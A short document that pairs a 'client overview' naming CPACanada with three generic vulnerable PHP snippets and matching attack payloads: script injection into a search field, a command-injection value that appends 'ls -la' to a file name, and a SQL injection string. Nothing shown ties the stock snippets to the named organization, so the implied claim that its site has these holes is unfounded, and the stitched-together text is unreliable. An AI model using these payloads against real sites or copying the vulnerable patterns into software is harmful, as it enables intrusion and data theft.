Client Overview:
Industry: Professional Association
Company Name: CPACanada
Website: www.cpacanada.ca
html
<!-- Vulnerable Code -->
<input type="text" name="search" value="<?php echo $_GET['search']; ?>">
<!-- Attack Payload -->
<script>alert('XSS Attack');</script>
<!-- Vulnerable Code -->
$fileName = $_GET['file'];
exec("cat /path/to/files/" . $fileName);
<!-- Attack Payload -->
file.txt; ls -la
<!-- Vulnerable Code -->
$sql = "SELECT * FROM users WHERE username = '" . $_GET['username'] . "'";
<!-- Attack Payload -->
' OR '1'='1'; --